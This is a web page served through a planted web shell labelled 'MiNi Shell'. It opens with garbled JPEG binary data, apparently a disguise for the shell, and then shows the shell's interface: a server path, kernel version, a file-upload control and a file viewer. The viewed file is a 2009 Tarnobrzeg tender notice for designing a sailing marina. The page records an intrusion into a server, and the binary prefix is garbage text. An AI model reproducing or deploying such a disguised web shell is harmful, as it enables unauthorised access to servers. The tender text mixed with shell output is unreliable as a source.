JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090415/106206-N-2009.html

<p class="kh_header"><b>Tarnobrzeg: Opracowanie Projektu budowlanego stanicy wodniackiej nad Zbiornikiem Machowskim w Tarnobrzegu</b><br>
<b>Numer ogłoszenia: 106206 - 2009; data zamieszczenia: 15.04.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Prezydent Miasta Tarnobrzega , ul. Kościuszki 32, 39-400 Tarnobrzeg, woj. podkarpackie, tel. 015 8226570, faks 015 8222504.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.tarnobrzeg.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie Projektu budowlanego stanicy wodniackiej nad Zbiornikiem Machowskim w Tarnobrzegu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest opracowanie projektu budowlano - wykonawczego na budowę stanicy wodniackiej nad Zbiornikiem Machowskim w Tarnobrzegu.

2. Zamówienie swoim zakresem obejmuje : 
1.1.Opracowanie w wersji papierowej i elektronicznej projektu budowlano - wykonawczego na budowę stanicy wodniackiej nad Zbiornikiem Machowskim                       w Tarnobrzegu. Projekt powinien być poprzedzony koncepcją uzgodniona                               z Zamawiającym.
1.2 Dokumentacja projektowa obejmuje:
1.	Budynek żeglarski dla potrzeb szkoleń i administracji z zapleczem żywnościowym, hotelarskim (dla kadry), dydaktycznym, sanitarnym, szatniowym itp., dwukondygnacyjny z wieżą i poddaszem użytkowym.
a/pomieszczenia na parterze:
- sala wykładowa na ok. 40 osób,
- świetlica, wc męskie i żeńskie, szatnie ( w tym dla niepełnosprawnych),
- bufet, kuchnia, zmywalnie,
- pomieszczenia administracyjne,
- kotłownia.
b/ pomieszczenia na piętrze:
- pokoje gościnne dla    wykładowców z łazienkami ( ok. 16 osób),
- pomieszczenie dla ochrony z kuchnią i łazienką.
c/ poddasze użytkowe:
- pokoje dla kadry ok. 6 osób z łazienkami,
- sala szkoleniowa  ( wykładowa) na ok. 40 osób),
- wyjście na wieżę,
d/ wieża obserwacyjna z zadaszeniem.
2.	Hangar na łódki  5 - 8 stanowiskowy.
3.	Wiata na sprzęt żeglarski.
4.	Keja stała i pływająca na ok. 80 stanowisk.
5.	Altany rekreacyjno - grilowe szt. 2 na ok. 50 miejsc.
6.	Drogi komunikacyjne dla pojazdów samochodowych i dla pieszych.
7.	Parkingi  ok. 40 - 50 stanowisk.
8.	Plac apelowy  z masztem regatowym.
9.	Ogrodzenie i oświetlenie obiektów.
10.	 Trybuny dla publiczności na ok. 200 miejsc.

Zakres prac obejmuje:
a)	analizę istniejącego zagospodarowania terenu z uwzględnieniem ustaleń obowiązującego (lub w toku uchwalania) planu miejscowego w obszarze projektowania, rozpoznanie zakresu wydanych przez organy samorządu terytorialnego decyzji lokalizacyjnych  w aspekcie budownictwa mieszkaniowego  i obsługi komunikacyjnej przyległej do stanicy, 
b)	przeprowadzenie wizji lokalnej w terenie i opracowanie aktualnej mapy do celów projektowych w skali 1:500,
c)	uzyskanie w imieniu inwestora warunków technicznych zasilania w media, rozwiązania kolizji z uzbrojeniem, opinii, decyzji oraz innych uzgodnień wymaganych rozwiązaniami projektowymi (ewentualne opracowanie operatów wodno - prawnych itp.),
d)	uzyskanie w imieniu inwestora decyzji o ustaleniu lokalizacji inwestycji celu publicznego wraz z niezbędnymi opracowaniami i uzgodnieniami                              (np. środowiskowe uwarunkowanie realizacji inwestycji) w zakresie wymaganym przepisami ustawy Prawo Budowlane, 
e)	uzyskanie map ewidencyjnych dla działek (nieruchomości) w liniach rozgraniczających drogi, z pełnym wypisem z rejestru gruntów i opisem stanu prawnego, 
f)	projekt powinien być poprzedzony opracowaniem koncepcji w co najmniej dwóch wariantach,
g)	wykonanie operatów podziałowych nieruchomości - o ile zajdzie taka potrzeba,
h)	opracowanie w wersji papierowej i wersji elektronicznej na komputerowym nośniku informacji zapisane w formacie PDF :
- projektu budowlanego, zgodnie z wymogami ustawy Prawo budowlane i ustawy Prawo zamówień publicznych - w ilości 5 kpl. w wersji papierowej i 2 kpl.                   w wersji elektronicznej,
- projektu wykonawczego, we wszystkich wymaganych branżach, na zakres objęty projektem budowlanym, zgodnie z wymogami ustawy Prawo budowlane i ustawy Prawo zamówień publicznych - w ilości 6 kpl. w wersji papierowej i 2 kpl.                   w wersji elektronicznej,
i)	sporządzenie przedmiarów robót i kosztorysów inwestorskich dla wszystkich branż, zgodnie z przepisami określonymi rozporządzeniem Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym (Dz. U. Nr 130 poz. 1389) - w dwóch kompletach                w wersji papierowej i dwóch kompletach w wersji elektronicznej na komputerowym nośniku informacji zapisane w PDF,
j)	opracowanie specyfikacji technicznej wykonania i odbioru robót - w dwóch egzemplarzach w wersji papierowej i w dwóch egzemplarzach w wersji elektronicznej na komputerowym nośniku informacji zapisane w PDF,

1.3. Pełnienie nadzoru autorskiego nad  realizacją robót budowlanych we wszystkich branżach objętych dokumentacją  projektową do momentu zakończenia robót budowlanych i podpisania przez komisję protokołu odbioru końcowego tych robót. Ilość pobytów na budowie będzie zależała od ilości braków, czy błędów                                 w dokumentacji projektowej, które będą wymagały rozwiązania celem dalszej realizacji zadania inwestycyjnego. Zamawiający zapłaci za faktyczne udokumentowane pobyty autorskie. Nadzór autorski obejmuje czynności określone wymogami ustawy z dnia                7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2006 r. nr 156 poz. 1118, wraz           z późniejszymi zmianami), ponadto czynności związane z formułowaniem na bieżąco odpowiedzi na pytania zadawane przez Wykonawców w trakcie trwania postępowania o zamówienie publiczne, którego przedmiotem będzie realizacja robót wg dokumentacji projektowej, która stanowi przedmiot niniejszej specyfikacji. 
1.4.Uzyskanie w imieniu inwestora prawomocnej decyzji o środowiskowych uwarunkowaniach realizacji inwestycji w zakresie wymaganym przepisami ustawy Prawo ochrony środowiska.
1.5.Uzyskanie w imieniu inwestora prawomocnej decyzji o zezwoleniu na realizację inwestycji zgodnie z ustawą z dnia 25 lipca 2008 r. o zmianie ustawy o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych oraz                    z zmianie niektórych innych ustaw (Dz. U. z dnia 26 sierpnia 2008 r.) - w przypadku konieczności uzyskania takiej decyzji.
1.6.Uzyskanie w imieniu inwestora warunków technicznych budowy, przebudowy                 i zabezpieczenia urządzeń infrastruktury technicznej, opinii, decyzji oraz innych uzgodnień wymaganych rozwiązaniami projektowymi. 
1.7.Przygotowanie we własnym zakresie i na własny koszt wszystkich materiałów do projektowania, w tym:
a)	aktualnej mapy do celów projektowych wraz z wypisem i wyrysem działek objętych zakresem projektowym,
b)	materiałów do wniosku o wydanie decyzji o środowiskowych uwarunkowaniach zgody na realizację inwestycji,
c)	materiałów do wniosku o wydanie decyzji o zezwoleniu na realizację inwestycji. 

3. Cel opracowania: stworzenie ośrodka sportowo - rekreacyjnego nad Zbiornikiem Machowskim w Tarnobrzegu.
4.   Wymagania dotyczące wykonania opracowań objętych zamówieniem:
4.1.Materiały do wniosku w wydanie decyzji o środowiskowych uwarunkowaniach należy przygotować zgodnie z wymaganiami określonymi w ustawie z dnia                                3 października 2008 r.  o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz.U. nr 199, poz.1227).
4.2.Dokumentacja projektowa powinna być sporządzona zgodnie z rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu                i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno - użytkowego (Dz. U. nr 202, poz. 2072).
4.3.Kosztorys inwestorski powinien być sporządzony w oparciu o Rozporządzenie Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określania metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych                            w programie funkcjonalno - użytkowym (Dz. U. Nr 130 poz. 1389) w układzie zgodnym z układem pozycji cen jednostkowych wynikających z opracowanych Szczegółowych Specyfikacji Technicznych.
4.4.Szczegółowe specyfikacje techniczne wykonania i odbioru robót budowlanych powinny być sporządzone na podstawie aktualnie obowiązujących norm. W każdej specyfikacji należy dokładnie określić roboty objęte daną specyfikacją.
4.5.Przekazywana dokumentacja będzie wzajemnie skoordynowana technicznie                     i kompletna z punktu widzenia celu, któremu ma służyć. Zawierać będzie wymagane potwierdzenia sprawdzeń rozwiązań projektowych w zakresie wynikającym                           z przepisów, wymagane opinie, uzgodnienia, zgody i pozwolenia w zakresie wynikającym z przepisów, a także spis opracowań i dokumentacji składających się na komplet przedmiotu zamówienia. Posiadać będzie oświadczenie Jednostki Projektującej, podpisane przez projektantów odpowiedzialnych za spełnienie tych wymagań,                     że została wykonana zgodnie z umową, obowiązującymi normami i w stanie kompletnym z punku widzenia celu, któremu ma służyć. Posiadać będzie zaświadczenia o przynależności projektantów do Okręgowej Izby Inżynierów Budownictwa.
4.6.Forma opracowania:
a) opracowania składające się na przedmiot zamówienia należy sporządzić w wersji
    papierowej i elektronicznej, 
b) w wersji elektronicznej wszystkie materiały tekstowe, a także opisy techniczne                   i obliczenia należy zapisać w formacie DOC. Przedmiary i kosztorysy należy zapisać                      w formacie  PDF, ponadto całość dokumentacji składającej się  na przedmiot zamówienia powinna być zapisana w formacie PDF.
5. Wykonawca udzieli rękojmi i gwarancji wykonane opracowanie projektowe na okres do końca czasu realizacji robót  budowlanych ustalonych z wykonawcą tych robót,.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> nie dotyczy<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. W postępowaniu mogą wziąć udział wykonawcy, którzy spełniają następujące warunki:
1)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają  obowiązek posiadania takich uprawnień, 
2)	posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia:
a)	opracowali w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia minimum dwie dokumentacje projektowe obejmujące budowę dróg i chodników oraz dokumentacje projektowe na budowę budynków użyteczności publicznej wraz                        z likwidacją kolizji z istniejącym uzbrojeniem terenu (podziemnym                       i nadziemnym), w tym likwidacją kolizji z kablami elektroenergetycznymi, wodociągami i sieciami telekomunikacyjnymi, potwierdzone referencjami, że prace te zostały wykonane terminowo, z należytą starannością,
b)	Główny projektant i projektanci poszczególnych branż są członkami Izby Inżynierów Budownictwa.
3)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego.
2. Zamawiający dokona oceny spełniania warunków na podstawie złożonego oświadczenia i dokumentów opisanych w pkt VI specyfikacji istotnych warunków zamówienia,                wg formuły  spełnia/nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełniania warunku posiadania uprawnień do wykonywania działalności lub czynności oraz nie podlegania wykluczeniu na podstawie art. 24 ustawy Prawo Zamówień Publicznych Wykonawca zobowiązany jest przedłożyć następujące oświadczenia i dokumenty:
a)	oświadczenie o spełnianiu warunków udziału w postępowaniu wg załączonego wzoru ( załącznik nr 4 do SIWZ),
b)	aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
c)	aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne 
i społeczne, lub zaświadczenia, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu, wystawionych nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się                o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców                         w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
d)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 u.p.z.p., wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się 
o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców 
w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich),
e)	aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 u.p.z.p., wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców w ofercie muszą być złożone przedmiotowe dokumenty dla każdego z nich);

2. W celu potwierdzenia spełniania warunku posiadania niezbędnej wiedzy                                   i doświadczenia oraz dysponowania potencjałem technicznym i osobami zdolnymi                 do wykonania zamówienia, Wykonawca zobowiązany jest przedłożyć następujące dokumenty:
a)	wykaz zamówień opisanych w pkt. V ppkt 1.2)a) zrealizowanych w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy w tym okresie , z podaniem wartości, przedmiotu zamówienia, dat realizacji oraz odbiorców - wzór stanowi załącznik nr 6 do SIWZ, poparty dokumentami świadczącymi o ich należytym wykonaniu. 
Wykazane w załączniku do oferty zamówienie lub zamówienia muszą być poparte dokumentami potwierdzającymi, że zlecone zamówienie(a) zostało(y) wykonane               z należytą starannością (np. referencje, protokoły odbioru przedmiotu umowy(ów).
b)	wykaz osób, które będą wykonywać zamówienie lub uczestniczyć                                  w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do wykonania zamówienia - wzór stanowi załącznik nr 5  do SIWZ. Jeżeli w wykazie wykonawca wskazał osoby, którymi będzie dysponował winien przedłożyć pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia. Do oferty należy dołączyć kserokopie dokumentów stwierdzających, że osoby, które będą wykonywać zamówienie posiadają odpowiednie uprawnienia do wykonania prac objętych przedmiotem zamówienia. W przypadku Głównego projektanta i  projektantów  poszczególnych branż należy do oferty dołączyć kserokopię dokumentu potwierdzającego, że są członkami Izby Inżynierskiej Budownictwa,
      
W przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie.

3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są do złożenia wraz z ofertą pełnomocnictwa do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Wszelka korespondencja prowadzona będzie wyłącznie                       z pełnomocnikiem..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.tarnobrzeg.eobip.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Tarnobrzeg
ul. Mickieiwcza 7
39-400 Tarnobrzeg.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.04.2009 godzina 10:00, miejsce: Knacelaria Ogólna Urzędu Miasta Tarnobrzeg
ul. Mickiewicza 7
39-400 Tarnobrzeg.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com